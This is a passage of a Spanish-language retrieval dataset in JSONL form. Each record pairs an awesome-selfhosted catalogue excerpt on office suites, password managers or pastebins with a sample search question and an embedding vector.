"v": [0.0477, 0.12672, -0.07145, -0.04878, 0.07606, -0.17914, 0.08518, 0.05075, -0.05964, -0.03563, -0.1359, -0.09862, 0.10926, -0.06441, 0.04611, 0.02842, 0.19867, -0.1389, -0.10594, -0.06721, 0.0155, -0.07599, -0.15353, 0.04208, -0.06962, -0.05436, 0.02927, 0.03285, -0.11565, 0.07983, 0.02742, 0.006, 0.01581, -0.04191, -0.1163, 0.13659, 0.00622, 0.08551, -0.01716, -0.05371, -0.01656, 0.06967, -0.09359, 0.05623, -0.01887, 0.02241, -0.08896, 0.08574, -0.1339, 0.02588, -0.05087, -0.11946, -0.05279, 0.02037, -0.07988, -0.14545, 0.19045, -0.09881, -0.03198, -0.1317, -0.02976, 0.07586, -0.13045, -0.02647, -0.02196, -0.04627, 0.06188, -0.08948, 0.02772, 0.10042, -0.09858, 0.05409, 0.01967, -0.09552, -0.04524, -0.08448, 0.00299, -0.03609, -0.02807, 0.00412, 0.10965, 0.01113, 0.00074, 0.04849, -0.05966, -0.066, 0.08833, -0.10277, 0.10432, -0.01628, -0.07854, -0.01125, 0.02725, 0.07489, 0.02558, 0.04218, 0.04457, -0.05349, -0.0344, 0.03775, 0.05991, -0.03478, -0.0847, -0.05123, -0.03009, 0.09573, -0.10414, 0.01552, -0.11624, 0.02872, 0.06551, 0.05873, 3e-05, 0.04533, 0.07232, 0.01419, 0.00711, 0.0134, -0.04496, -0.07572, 0.127, 0.03008, -0.0823, -0.06329, 0.04399, -0.05411, -0.02573, 0.08462, 0.00895, -0.05516, -0.06828, -0.04926, -0.10025, -0.02091, 0.04834, -0.03612, -0.01472, -0.0923, 0.00271, -0.05998, 0.00359, -0.02366, -0.06808, -0.11767, -0.03044, -0.02326, -0.00876, 0.066, -0.06814, -0.07689, 0.05753, -0.04179, 0.00205, 0.08279, -0.01275, -0.01971, -0.01032, 0.05414, -0.15501, -0.0105, -0.02055, 0.0132, 0.00301, -0.01774, 0.01456, -0.05918, 0.06052, 0.0643, 0.07682, 0.03363, 0.05253, 0.0019, 0.07256, -0.08922, 0.00975, -0.09024, -0.04352, 0.01176, -0.05681, -0.04903, -0.02488, 0.00039, 0.01443, -0.0279, -0.00822, 0.02262, 0.06916, -0.01722, 0.05611, -0.00489, 0.00995, 0.04597, 0.05031, -0.0109, -0.01447, 0.01277, 0.00909, -0.03077, 0.02646, -0.02051, 0.01558, -0.02613, 0.0074, 0.00914, 0.02492, 0.09034, -0.08018, 0.07986, -0.01363, 0.01303, 0.00432, -0.00469, 0.01534, -0.0305, -0.04341, -0.01973, -0.0172, 0.00832, -0.0182, -0.02399, 0.05247, -0.02557, 0.01427, -0.05787, 0.03606, 0.03515, 0.04454, 0.06884, 0.00561, -0.00719, 0.03571, -0.01158, 0.02657, 0.00159, 0.01005, -0.02945, 0.06955, -0.02171, -0.05512, -0.01881, 0.00454, -0.00514, 0.00617, 0.00075, -0.06725, 0.00396, -0.0188, -0.04777, -0.01643, -0.04832, -0.02803, 0.01099, 0.06925, -0.04379, 0.01284, -0.06267]} -{"tipo": "pregunta", "herramienta": "Office Suites", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Office Suites", "tema": "office suites", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Office Suites: Collabora Online Development Edition β€” Collabora Online Development Edition (CODE) is a powerful LibreOffice-based online office that supports all major document, spreadsheet and presentation file formats, which you can integrate in your own infrastructure [MPL-2.0, C++]. CryptPad β€” Collaboration suite built to enable collaboration, synchronizing changes to documents in real time [AGPL-3.0, Nodejs/Docker]. Digislides β€” Create multimedia presentations in a quick and easy way. (documentation in French) [AGPL-3.0, Nodejs/PHP]. Etherpad β€” Highly customizable online editor providing collaborative editing in real-time [Apache-2.0, Nodejs/Docker]. Grist β€” Next-generation spreadsheet with relational structure, formula-based access control, and a portable, self-contained format (alternative to Airtable) [Apache-2.0, Nodejs/Python/Docker]. ONLYOFFICE β€” Office suite that enables you to manage documents, projects, team and customer relations in one place [AGPL-3.0, Nodejs/Docker].", "indexar": "ΒΏCual es una alternativa libre a Airtable que funcione como hoja de calculo avanzada?", "v": [0.01749, 0.0128, -0.23369, 0.0384, -0.00501, -0.09504, 0.10675, -0.04163, -0.20657, -0.02808, -0.07886, -0.23739, -0.04899, 0.13692, 0.14764, -0.06546, 0.04835, -0.19568, 0.01147, 0.04347, -0.05341, -0.00613, -0.14008, -0.03918, -0.09814, -0.02387, 0.0022, 0.03895, -0.14405, 0.00232, 0.06455, 0.01861, 0.14648, -0.07467, 0.02596, 0.04234, 0.01259, 0.05306, 0.05921, -0.05813, -0.0208, -0.01735, -0.11645, -0.02178, -0.05111, -0.01235, -0.00782, 0.04463, -0.03429, 0.12617, -0.02011, -0.06594, -0.02597, 0.05978, 0.0032, -0.04945, 0.14671, -0.01191, 0.05315, -0.12598, -0.05686, 0.1128, 0.04458, -0.03069, -0.01726, -0.02054, 0.02397, -0.07466, 0.02949, 0.06995, -0.07159, 0.07017, 0.01834, -0.03444, -0.07525, -0.03602, -0.04295, -0.00661, -0.01089, 0.00153, 0.03047, -0.09854, -0.04655, 0.03353, -0.13203, -0.08363, 0.14435, -0.07359, 0.01555, 0.12963, 0.0207, -0.0522, -0.00856, 0.2019, 0.0129, -0.04641, -0.04771, 0.07876, 0.02985, -0.03744, 0.07991, 0.03217, -0.07639, 0.00071, -0.02052, 0.08111, 0.02083, -0.03952, -0.11055, 0.06144, 0.01383, 0.06967, 0.04754, -0.06488, -0.03707, -0.03076, -0.07302, 0.03788, -0.03231, 0.00695, -0.02294, -0.03301, 0.0073, -0.06433, 0.03649, -0.06414, -0.02904, 0.10707, -0.03903, 0.08044, 0.00971, -0.03861, -0.05919, -0.03578, -0.04206, 0.02685, 0.0664, -0.01293, 0.04396, 0.0088, 0.04345, 0.09863, -0.04093, -0.05319, -0.01557, -0.03863, 0.07996, 0.04419, -0.05152, -0.03268, -0.00361, 0.01789, 0.05215, 0.19734, -0.03119, -0.03831, 0.03781, 0.01156, -0.08831, 0.10653, -0.00813, -0.06077, 0.03057, -0.03233, 0.02711, -0.0235, -0.00714, -0.0349, -0.00751, 0.02014, -0.06241, 0.02561, 0.02597, -0.1035, 0.05329, -0.0323, -0.03584, -0.08129, 0.06224, 0.00186, -0.06548, 0.0377, -0.00383, -0.05274, -0.00223, -0.03704, 0.03721, -0.02551, -0.0007, 0.02871, 0.04267, 0.01409, -0.03903, -0.03883, -0.05015, 0.00657, -0.02859, -0.05773, 0.00368, 0.00882, -0.05466, -0.0211, -0.01713, -0.00762, 0.0194, -0.01205, 0.00554, 0.09423, 0.0239, 0.04074, 0.02421, 0.0148, 0.04563, -0.0087, -0.01677, 0.0429, 0.02014, -0.02819, -0.00043, 0.00429, 0.06977, 0.03049, -0.02859, -0.01245, 0.01763, 0.02393, 0.01111, 0.08465, 0.04985, 0.01911, 0.04899, -0.00441, 0.03727, -0.03127, -0.00033, -0.00415, 0.03395, 0.06098, -0.06765, -0.03061, 0.09517, 0.06203, 0.00811, 0.02338, -0.06009, -0.0148, -0.05454, 0.0006, -0.00143, -0.05403, -0.0178, 0.00682, 0.00258, -0.00953, 0.01034, -0.01296]} -{"tipo": "pregunta", "herramienta": "Password Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Password Managers", "tema": "password managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Password Managers: AliasVault β€” End-to-end encrypted password manager with a built-in email alias generator and server [MIT, Docker]. Bitwarden β€” Password manager with a webapp, browser extension, and mobile app [⚠, AGPL-3.0, Docker/C#]. Passbolt β€” Collaborative password manager [AGPL-3.0, PHP/deb/K8S/Docker]. PassIt β€” Simple password manage with sharing features by group and user, but no administration interface [AGPL-3.0, Docker/Python]. Psono β€” Password manager for companies [Apache-2.0, Python]. Teampass β€” Password manager dedicated for managing passwords in a collaborative way. One symmetric key is used to encrypt all shared/team passwords and stored server side in a file and the database. works on any server Apache, MySQL and PHP [GPL-3.0, PHP]. Vaultwarden β€” Lightweight Bitwarden server API implementation written in Rust [GPL-3.0, Rust/Docker].", "indexar": "que programa me sirve para gestionar contraseΓ±as de forma colaborativa", "v": [0.21668, 0.06981, -0.16542, -0.29583, 0.0632, -0.15235, -0.00554, -0.04226, -0.04351, -0.10459, 0.00341, -0.06136, 0.05498, -0.12032, 0.04547, 0.05006, 0.21301, -0.10341, 0.03358, 0.10773, 0.00522, 0.03733, 0.02232, -0.03384, 0.02326, -0.07143, 0.0716, -0.11175, -0.00168, -0.0078, 0.04462, -0.04759, 0.04537, -0.05942, 0.00552, 0.15784, -0.04181, 0.01191, 0.05513, 0.03282, -0.04489, 0.04884, -0.11705, 0.09152, 0.09231, 0.04877, 0.03387, -0.06075, 0.03477, 0.06197, -0.12634, -0.07776, -0.02792, -0.04849, 0.00056, -0.07911, 0.02864, -0.16016, -0.0885, -0.01805, -0.11035, 0.03365, 0.01006, 0.05484, -0.03373, -0.01656, 0.1345, -0.00798, -0.11466, 0.15768, -0.00758, 0.0639, -0.03654, -0.06215, 0.02292, -0.0165, 0.07364, 0.01699, 0.03011, 0.01695, 0.04589, 0.0164, 0.07469, 0.0196, -0.06507, 0.042, 0.06809, -0.03195, 0.03982, -0.01618, -0.0247, -0.03488, 0.00874, -0.03008, 0.03197, -0.00828, 0.05669, 0.03751, -0.04074, 0.0309, 0.01116, -0.007, -0.07762, 0.08362, -0.07795, 0.12702, -0.01562, -0.01053, -0.01188, 0.00553, 0.07556, 0.04371, 0.00414, -0.04853, 0.01028, 0.02164, -0.00095, -0.04921, 0.08001, -0.02382, -0.06477, -0.05604, -0.02849, 0.0285, 0.15091, 0.06421, 0.00579, 0.07512, -0.02747, -0.01305, -0.08288, 0.02139, 0.00488, 0.04846, -0.00737, -0.00278, -0.0059, -0.03242, -0.09386, -0.09017, -0.02791, 0.06947, 0.06412, -0.009, 0.02679, -0.02534, 0.10121, -0.03173, 0.0588, 0.05934, 0.04303, -0.03216, -0.01725, 0.02327, -0.09666, 0.01131, -0.01125, -0.03782, -0.12172, 0.11723, -0.02417, -0.02987, -0.06534, 0.02859, -0.04916, -0.04723, 0.04377, 0.0665, 0.07739, 0.09132, 0.02459, 0.06231, 0.0595, -0.06497, -0.01199, -0.0439, -0.05587, -0.14638, 0.03949, -0.06099, -0.03902, -0.0055, 0.04357, 0.03432, 0.00277, -0.04354, 0.00813, 0.07198, -0.04497, -0.04244, 0.04284, 0.00664, -0.00926, 0.00612, 0.01288, -0.04343, 0.00143, -0.02235, -0.00253, -0.04194, 0.00696, 0.01144, 0.01597, -0.01038, 0.02947, 0.09624, -0.08074, 0.00806, 0.0793, 0.07302, 0.01311, -0.00487, 0.01633, -0.01087, -0.05703, -0.06938, -0.04195, 0.05072, 0.0062, -0.0076, -0.01492, -0.05706, 0.04857, 0.03089, 0.04294, -0.05531, 0.03172, 0.05431, 0.0228, -0.01818, 0.00204, -0.03998, -0.00507, 0.00063, 0.03746, -0.06828, -0.04298, -0.05456, -0.02359, -0.05595, -0.03291, 0.03762, 0.02607, -0.05634, -0.04667, -0.0298, -0.05166, -0.00456, 0.01074, 0.02509, -0.07284, 0.02182, 0.01445, 0.01735, 0.03921, 0.01387]} -{"tipo": "pregunta", "herramienta": "Password Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Password Managers", "tema": "password managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Password Managers: AliasVault β€” End-to-end encrypted password manager with a built-in email alias generator and server [MIT, Docker]. Bitwarden β€” Password manager with a webapp, browser extension, and mobile app [⚠, AGPL-3.0, Docker/C#]. Passbolt β€” Collaborative password manager [AGPL-3.0, PHP/deb/K8S/Docker]. PassIt β€” Simple password manage with sharing features by group and user, but no administration interface [AGPL-3.0, Docker/Python]. Psono β€” Password manager for companies [Apache-2.0, Python]. Teampass β€” Password manager dedicated for managing passwords in a collaborative way. One symmetric key is used to encrypt all shared/team passwords and stored server side in a file and the database. works on any server Apache, MySQL and PHP [GPL-3.0, PHP]. Vaultwarden β€” Lightweight Bitwarden server API implementation written in Rust [GPL-3.0, Rust/Docker].", "indexar": "cual es una alternativa libre a Bitwarden que funcione en mi propio servidor", "v": [-0.1266, 0.10684, -0.21164, -0.01362, -0.05565, -0.11753, -0.02652, -0.17018, -0.11352, -0.11066, -0.00295, -0.13727, 0.05162, 0.03286, 0.14436, -0.05338, 0.11311, -0.18745, 0.11488, -0.04108, -0.04236, 0.01703, 0.06387, -0.03388, -0.04487, 0.00902, 0.10428, 0.03288, -0.11001, 0.07484, 0.08508, -0.02082, 0.14394, -0.03149, 0.03387, -0.10453, 0.00487, 0.15566, 0.0153, -0.00045, 0.05197, -0.01921, -0.05723, 0.09389, -0.04868, -0.06185, 0.0177, -0.06752, 0.03299, 0.05132, -0.08901, -0.11021, -0.07834, 0.04613, 0.01337, 0.04103, 0.10822, -0.19203, 0.03489, 0.0262, -0.13795, 0.01603, 0.03577, -0.08686, 0.07344, -0.05023, -0.05757, -0.02612, -0.07542, 0.04065, -0.04898, 0.05494, -0.03302, -0.06937, -0.02337, 0.09724, -0.03626, -0.01818, 0.03953, 0.06381, 0.05261, -0.0286, -0.01234, 0.09816, -0.09992, -0.09549, 0.06284, -0.12087, 0.05573, 0.09119, 0.03698, 0.04839, -0.07649, 0.14622, 0.00797, -0.06459, 0.09655, 0.05665, 0.01949, 0.0356, 0.11798, 0.04892, -0.09445, -0.01163, 0.04345, 0.05787, 0.06687, -0.01901, -0.03405, 0.01221, 0.0265, 0.01108, -0.02979, 0.00907, -0.06457, -0.07559, -0.07121, 0.00257, 0.0327, 0.08963, -0.07895, -0.05182, 0.02768, -0.02907, 0.02593, 0.00628, 0.02, -7e-05, -0.02524, -0.00496, 0.05017, -0.01386, -0.08804, -0.09035, -0.06929, 0.0113, 0.08154, -0.02912, -0.01509, -0.02303, 0.01569, 0.03957, 0.02079, -0.03743, 0.0912, 0.00568, 0.09713, -0.06468, -0.06485, 0.02051, -0.04073, -0.03604, -0.02783, 0.06464, -0.09037, -0.01043, 0.00731, -0.08047, -0.03711, 0.12568, 0.04858, 0.00448, 0.00077, 0.06598, -0.00906, -0.01559, -0.00989, 0.03563, -0.00423, 0.00074, -0.07907, 0.03124, -0.00101, -0.09217, 0.06112, -0.06896, -0.0934, -0.05785, 0.07021, -0.00582, -0.00894, 0.02633, -0.05021, -0.05352, -0.04039, -0.03852, -0.0424, 0.01934, 0.00955, 0.0395, 0.02455, -0.01717, -0.092, -0.01287, -0.02904, -0.02271, -0.02077, -0.08772, -0.03731, -0.02929, -0.02168, -0.04071, -0.02388, -0.0339, -0.00368, -0.03267, -0.03068, 0.05039, 0.02622, 0.04457, 0.03224, 0.01273, 0.11053, -0.00541, -0.03419, 0.00218, 0.06082, -0.07211, -0.01014, -0.04609, 0.04214, 0.02362, 0.02667, -0.00641, 0.00623, 0.03472, 0.02784, 0.01918, 0.03645, -0.00943, -0.035, 0.00066, -0.04162, -0.01159, 0.02372, -0.01044, 0.02512, 0.00201, -0.04208, -0.07139, 0.05389, 0.08182, -0.00153, -0.07765, -0.01311, -0.05622, -0.05252, -0.0126, -0.03478, -0.04709, -0.02557, 0.00292, 0.01727, -0.0308, 0.0092, -0.01295]} -{"tipo": "pregunta", "herramienta": "Password Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Password Managers", "tema": "password managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Password Managers: AliasVault β€” End-to-end encrypted password manager with a built-in email alias generator and server [MIT, Docker]. Bitwarden β€” Password manager with a webapp, browser extension, and mobile app [⚠, AGPL-3.0, Docker/C#]. Passbolt β€” Collaborative password manager [AGPL-3.0, PHP/deb/K8S/Docker]. PassIt β€” Simple password manage with sharing features by group and user, but no administration interface [AGPL-3.0, Docker/Python]. Psono β€” Password manager for companies [Apache-2.0, Python]. Teampass β€” Password manager dedicated for managing passwords in a collaborative way. One symmetric key is used to encrypt all shared/team passwords and stored server side in a file and the database. works on any server Apache, MySQL and PHP [GPL-3.0, PHP]. Vaultwarden β€” Lightweight Bitwarden server API implementation written in Rust [GPL-3.0, Rust/Docker].", "indexar": "con que puedo montar un gestor de contraseΓ±as si necesito generar alias de correo tambiΓ©n", "v": [0.06406, 0.07336, -0.19982, -0.13586, -0.10388, 0.04348, -0.01384, 0.01545, -0.19511, -0.11597, -0.02737, 0.06213, 0.033, -0.05355, 0.15141, 0.03547, 0.10238, -0.01743, 0.05689, 0.16236, -0.01027, -0.06471, 0.06148, -0.07963, -0.02582, 0.03854, 0.04763, -0.12922, -0.03654, 0.03613, -0.043, -0.04011, 0.02967, -0.08893, -0.05896, 0.05554, -0.03612, 0.07252, -0.00828, 0.09411, 0.06539, 0.08429, -0.17908, 0.08852, -0.03804, -0.07627, 0.00682, -0.09262, 0.02429, -0.0171, 0.00434, -0.10247, -0.11293, 0.02088, -0.04081, -0.00827, 0.17284, -0.03222, 0.01381, -0.00792, -0.11954, 0.06828, 0.04485, 0.18512, -0.12703, -0.03556, -0.00749, 0.04281, -0.14216, -0.01898, -0.05094, 0.01399, -0.06204, 0.08335, 0.02551, 0.05411, 0.05123, -0.00897, 0.00262, 0.09619, -0.01912, -0.01433, 0.0259, 0.02666, -0.11947, 0.02652, 0.04651, -0.09947, 0.06619, -0.06066, 0.05734, -0.03596, -0.00049, 0.00804, -0.04467, -0.06214, 0.02399, 0.09213, -0.09864, 0.06025, -0.0761, 0.04498, -0.0174, 0.21847, 0.07239, 0.07292, 0.02906, 0.00041, 0.08044, -0.02068, -0.01822, 0.04398, -0.02639, -0.06281, 0.01089, -0.06862, -0.00503, -0.10929, 0.06979, 0.01735, -0.01467, -0.01047, 0.06504, 0.06317, 0.04879, -0.02511, 0.07234, 0.03266, 0.00832, 0.01269, 0.00488, -0.03591, -0.03048, -0.00252, -0.06008, 0.10482, -0.03334, -0.08947, -0.06297, -0.05357, -0.05944, 0.01793, 0.06921, -0.06283, 0.05776, 0.06038, 0.01781, -0.1144, -0.07643, 0.0036, 0.04403, 0.00281, 0.08145, 0.06077, -0.08831, 0.00489, -0.01436, -0.09308, 0.00841, 0.11275, 0.00321, -0.01673, -0.05922, 0.03925, -0.11516, -0.02396, -0.03611, 0.02616, 0.03003, 0.0502, -0.0283, 0.0262, 0.06719, -0.04621, 0.0425, -0.0301, 0.0115, -0.10738, -0.01201, -0.04812, 0.02678, -0.01842, -0.03686, 0.0542, -0.04665, -0.04307, 0.05436, 0.06149, 0.01986, 0.05677, 0.04, -0.00204, -0.0415, 0.00852, 0.00175, -0.03445, -0.00217, -0.04077, 0.00917, -0.06047, 0.02424, 0.00204, -0.05699, -0.06525, 0.00733, -0.01483, -0.10826, 0.05203, -0.01195, 0.03024, 0.05756, -0.02971, 0.00584, -0.04807, -0.00332, -0.05871, 0.00678, 0.00699, -9e-05, 0.01889, 0.01517, 0.05127, 0.078, 0.02795, 0.01833, -0.01522, -0.00584, 0.01405, 0.02615, 0.02848, -0.03214, 0.05237, -0.02302, -0.01198, 0.10179, 0.01103, 0.02075, -0.04284, -0.02862, -0.00687, 0.01663, 0.06342, 0.02956, -0.06219, -0.06028, -0.02434, -0.05617, 0.01598, -0.01545, -0.05603, -0.03796, 0.0138, -0.00395, 0.00432, -0.02487, -0.05034]} -{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: 1time β€” Zero-knowledge one-time secret sharing. Create a one-time link for a password, API key, or file. Encrypted client-side in the browser, never reaches the server in plaintext, self-destructs after the allowed number of views (one by default) [MIT, Docker]. BinPastes β€” Minimal pastebin supporting client-side encryption, fulltext search, one-time messages. Intended for one to few users looking for a simple pastebin deployment [Apache-2.0, Java]. ByteStash β€” Pastebin and file storage service with a simple web interface. Supports syntax highlighting, optional user authentication and public sharing [GPL-3.0, Docker]. Chiyogami β€” Pastebin with API, client-side encryption, user accounts, syntax highlighting, markdown rendering, and more [BSD-3-Clause, Docker]. dpaste β€” Simple pastebin with multiple text and code option, with short url result easy to remember [MIT, Docker/Python]. Hemmelig β€” Share encrypted secrets cross organizations, or as private persons [MIT, Docker/Nodejs].", "indexar": "que programa puedo usar para guardar notas encriptadas que se borran solas?", "v": [-0.13048, -0.01621, -0.22568, -0.11595, -0.06874, -0.11921, 0.00218, -0.05036, -0.11225, -0.16985, -0.1139, -0.10866, 0.08932, -0.01366, -0.01943, -0.09104, -0.0321, -0.06719, 0.0188, 0.10066, 0.00554, -0.06354, 0.05824, -0.07804, -0.14924, -0.01419, 0.0296, 0.07494, -0.06985, 0.10927, -0.07458, -3e-05, 0.19597, -0.05598, -0.08944, 0.02172, 0.01719, -0.02916, -0.0057, 0.06182, 0.05368, 0.07219, 0.04341, 0.06859, 0.02293, -0.08813, 0.02266, 0.06756, -0.00555, -0.05107, -0.01747, -0.0721, -0.09265, 0.05201, -0.00897, -0.13445, 0.01946, -0.10186, -0.09711, 0.04398, -0.08097, 0.0915, 0.04464, 0.04822, 0.03482, -0.05494, 0.00175, -0.04276, -0.15451, 0.09634, 0.00517, 0.06067, 0.03228, -0.03904, 0.05057, 0.03315, -0.05094, -0.04873, 0.02679, 0.09269, -0.09929, -0.07128, -0.00736, 0.08853, -0.12416, -0.06102, 0.09208, 0.00085, -0.06539, 0.03033, 0.02709, 0.04947, -0.01429, 0.01898, 0.05903, -0.07341, 0.08004, 0.06436, 0.00379, 0.05332, 0.1095, -0.0737, 0.05272, 0.09569, -0.0411, 0.08485, 0.02238, 0.01534, 0.06291, -0.01428, 0.01443, 0.06559, -0.14825, -0.05914, -0.11232, 0.00638, 0.00111, -0.07034, 0.0028, -0.02967, -0.0119, -0.02381, -0.06616, -0.03492, 0.12694, 0.00042, -0.07166, 0.07906, -0.06408, 0.08424, -0.08857, 0.04761, -0.05908, -0.01698, -0.04207, -0.00605, -0.01575, -0.05681, 0.02082, -0.05952, 0.0805, 0.08618, -0.04216, 0.04419, 0.04259, 0.0291, -0.00761, -0.04013, -0.07592, -0.03654, 0.08568, -0.0166, -0.01002, 0.04416, -0.02904, -0.02107, 0.0697, -0.12512, -0.07801, 0.03321, -0.0563, -0.00352, -0.01783, 0.02152, 0.02386, -0.07046, 0.04417, 0.02121, 0.03192, 0.045, 0.04329, 0.03707, 0.02283, -0.08078, 0.02062, -0.10104, 0.00956, -0.06968, -0.00654, -0.0829, -0.01197, -0.00847, -0.0016, 0.03645, 0.00538, 0.01396, 0.02562, 0.01778, -0.03416, -0.03744, 0.0118, 0.00508, -0.03344, 0.0047, -0.01413, 0.02032, 0.01661, 0.0165, 0.03508, -0.0531, -0.04692, -0.00983, -0.03866, -0.00877, 0.05542, 0.02894, -0.09815, -0.04324, 0.0232, 0.05386, 0.02557, -0.03684, 0.00363, -0.06386, -0.06508, -0.06273, -0.01398, 0.07957, -0.03104, -0.02263, 0.01092, 0.03083, 0.05537, -0.00146, 0.01624, -0.06345, -0.0006, 0.02474, 0.02694, 0.0425, -0.04406, 0.04163, -0.06314, 0.03026, 0.08812, -0.01972, -0.03998, -0.00394, -0.01121, -0.10175, -0.05694, 0.1065, -0.01947, -0.08442, -0.0755, -0.00897, -0.05785, 0.06393, -0.00675, -0.05871, 0.02206, 0.04578, 0.05442, -0.0885, 0.01065, 0.03191]} -{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: 1time β€” Zero-knowledge one-time secret sharing. Create a one-time link for a password, API key, or file. Encrypted client-side in the browser, never reaches the server in plaintext, self-destructs after the allowed number of views (one by default) [MIT, Docker]. BinPastes β€” Minimal pastebin supporting client-side encryption, fulltext search, one-time messages. Intended for one to few users looking for a simple pastebin deployment [Apache-2.0, Java]. ByteStash β€” Pastebin and file storage service with a simple web interface. Supports syntax highlighting, optional user authentication and public sharing [GPL-3.0, Docker]. Chiyogami β€” Pastebin with API, client-side encryption, user accounts, syntax highlighting, markdown rendering, and more [BSD-3-Clause, Docker]. dpaste β€” Simple pastebin with multiple text and code option, with short url result easy to remember [MIT, Docker/Python]. Hemmelig β€” Share encrypted secrets cross organizations, or as private persons [MIT, Docker/Nodejs].", "indexar": "con quΓ© herramienta puedo compartir un link de contraseΓ±a ΓΊnico sin enviar nada al servidor plano?", "v": [-0.03163, 0.14173, -0.22964, -0.19614, -0.07371, -0.12466, -0.03493, -0.1392, -0.04081, -0.08086, -0.06609, -0.06834, 0.04794, -0.10779, 0.03518, 0.07958, 0.21725, -0.04547, 0.10034, 0.0202, 0.01041, 0.0086, -0.05233, -0.08468, -0.09522, -0.04257, 0.09143, -0.02162, -0.09232, -0.05561, 0.00678, -0.07244, 0.05713, 0.00177, 0.0331, 0.05528, 0.05602, 0.18632, 0.04269, 0.03687, 0.04305, 0.06647, -0.08846, 0.14697, -0.04258, -0.0114, 0.03516, -0.00716, 0.10096, 0.04518, -0.11215, -0.12328, -0.14178, -0.08425, -0.0432, -0.06893, 0.24396, -0.14201, 0.05545, -0.07281, -0.1229, 0.05555, -0.05584, -0.02042, -0.0447, -0.013, -0.00093, 0.01077, -0.1077, 0.04916, -0.02872, -0.04727, -0.03478, -0.0472, 0.00998, 0.01851, 0.01754, 0.02771, -0.00281, 0.10032, 0.03469, 0.00389, -0.03192, 0.04075, -0.05955, -0.06631, 0.06687, 0.00684, 0.083, -0.07313, 0.02398, 0.01861, -0.0579, 0.06047, -0.01016, -0.06228, 0.06523, -0.06118, -0.05526, -0.01313, 0.13193, 0.02098, -0.04625, 0.11443, -0.01032, 0.05314, 0.03666, -0.00643, -0.00374, 0.00098, 0.05611, -0.0246, -0.01153, -0.03503, -0.04805, -0.04619, -0.08164, -0.06471, 0.02721, 0.00888, -0.0665, 0.00431, -0.0187, 0.00841, 0.04125, 0.00584, 0.0212, 0.07988, -0.01321, -0.04881, -0.06093, -0.01584, -0.03823, -0.0215, 0.00151, 0.04319, 0.01093, -0.10651, -0.06431, -0.06308, -0.00659, 0.01945, -0.0241, -0.08836, 0.06905, 0.04414, 0.04567, -0.0934, -0.09247, -0.00205, -0.01305, -0.0133, -0.01467, -0.0179, -0.07586, 0.021, -0.01225, -0.0486, -0.05539, 0.03654, -0.0463, 0.03667, -0.00354, 0.07782, -0.02756, -0.06123, 0.01112, -0.00541, 0.06258, 0.0646, 0.02611, 0.05388, 0.02817, -0.04713, -0.00802, -0.07642, -0.06537, -0.0841, -0.01388, -0.02686, -0.03659, -0.00126, -0.02672, 0.01299, -0.0302, -0.10813, 0.02344, 0.01063, 0.01998, 0.0289, 0.06705, 0.01412, 0.00429, 0.03925, 0.04133, -0.04117, -0.06764, -0.04143, 0.00236, -0.04145, -0.03838, -0.03206, 0.00241, -0.03018, 0.0071, 0.00802, -0.08435, 0.00861, -0.03626, 0.08764, 0.0282, -0.04224, 0.05054, -0.08401, -0.04741, 0.00716, 0.03795, 0.02658, -0.03491, -0.00623, 0.04769, 0.05047, 0.04806, 0.00993, 0.02584, 0.02146, -0.01915, 0.03691, 0.05837, 0.00793, -0.02173, 0.03768, -0.03487, 0.0005, 0.10171, -0.02428, -0.0121, -0.06375, -0.04011, -0.04844, -0.04401, 0.05299, 0.01995, -0.07795, -0.06927, -0.04345, -0.04834, 0.00434, -0.04753, -0.0665, -0.03035, -0.0442, 0.05922, -0.06078, 0.02221, -0.02543]} -{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: 1time β€” Zero-knowledge one-time secret sharing. Create a one-time link for a password, API key, or file. Encrypted client-side in the browser, never reaches the server in plaintext, self-destructs after the allowed number of views (one by default) [MIT, Docker]. BinPastes β€” Minimal pastebin supporting client-side encryption, fulltext search, one-time messages. Intended for one to few users looking for a simple pastebin deployment [Apache-2.0, Java]. ByteStash β€” Pastebin and file storage service with a simple web interface. Supports syntax highlighting, optional user authentication and public sharing [GPL-3.0, Docker]. Chiyogami β€” Pastebin with API, client-side encryption, user accounts, syntax highlighting, markdown rendering, and more [BSD-3-Clause, Docker]. dpaste β€” Simple pastebin with multiple text and code option, with short url result easy to remember [MIT, Docker/Python]. Hemmelig β€” Share encrypted secrets cross organizations, or as private persons [MIT, Docker/Nodejs].", "indexar": "cual es una alternativa libre a pastebin con encriptaciΓ³n en el cliente?", "v": [-0.07658, -0.02851, -0.05161, -0.02081, -0.02891, -0.20606, -0.03443, 0.03511, -0.14647, -0.11895, -0.01204, -0.19022, 0.00048, 0.03746, 0.05708, -0.10436, -0.01716, -0.09022, 0.16964, 0.01987, -0.02447, -0.12901, -0.03198, -0.02675, -0.13001, -0.0651, 0.06341, 0.07918, -0.12067, 0.13436, 0.03174, -0.08106, 0.03737, 0.00304, 0.10044, -0.00719, 0.02779, 0.0475, 0.02457, 0.09253, 0.16672, -0.15651, 0.03413, 0.08443, -0.03725, -0.02373, -0.09711, 0.05776, 0.01763, 0.0916, -0.11942, -0.11838, -0.19931, 0.02394, 0.06947, -0.02427, 0.03937, -0.16289, -0.00113, -0.03299, -0.03465, 0.10838, -0.01802, 